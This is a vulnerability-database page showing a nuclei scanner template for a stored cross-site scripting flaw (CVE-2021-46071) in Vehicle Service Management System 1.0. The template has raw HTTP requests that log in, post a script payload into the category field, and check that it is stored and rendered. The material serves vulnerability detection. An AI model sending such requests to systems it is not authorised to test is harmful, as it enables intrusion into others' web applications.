Lucene search
K

ehicle Service Management System 1.0 - Cross-Site Scripting

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Vehicle Service Management System 1.0 - Cross-Site Scripting vulnerability in Category Lis

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-46071
6 Jan 202216:15
attackerkb
Circl
CVE-2021-46071
6 Jan 202218:41
circl
CNNVD
Sourcecodester Vehicle Service Management System 跨站脚本漏洞
6 Jan 202200:00
cnnvd
CNVD
Sourcecodester Vehicle Service Management System Cross-Site Scripting Vulnerability (CNVD-2022-02642)
7 Jan 202200:00
cnvd
CVE
CVE-2021-46071
6 Jan 202215:27
cve
Cvelist
CVE-2021-46071
6 Jan 202215:27
cvelist
EUVD
EUVD-2021-32773
3 Oct 202520:07
euvd
NVD
CVE-2021-46071
6 Jan 202216:15
nvd
OSV
CVE-2021-46071
6 Jan 202216:15
osv
Prion
Cross site scripting
6 Jan 202216:15
prion
Rows per page
id: CVE-2021-46071

info:
  name: ehicle Service Management System 1.0 - Cross-Site Scripting
  author: TenBird
  severity: medium
  description: |
    Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS
    - https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss
    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46071
    - https://github.com/zecool/cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2021-46071
    cwe-id: CWE-79
    epss-score: 0.02736
    epss-percentile: 0.84323
    cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: vehicle_service_management_system_project
    product: vehicle_service_management_system
  tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project,vuln

http:
  - raw:
      - |
        POST /classes/Login.php?f=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}
      - |
        POST /classes/Master.php?f=save_category HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
      - |
        GET /admin/?page=maintenance/category HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(header_3, 'text/html')"
          - "status_code_3 == 200"
          - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
        condition: and
# digest: 490a00463044022048c5d8883b09453265dd3a815a95230b82015e0ffa6502dfcc3b28e38e43071502207a4b5d9960e9fc346daf07baea210dcbd937e6f6ce3e8ead835a4db04ff95936:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 23.5
CVSS 3.14.8
EPSS0.02736
28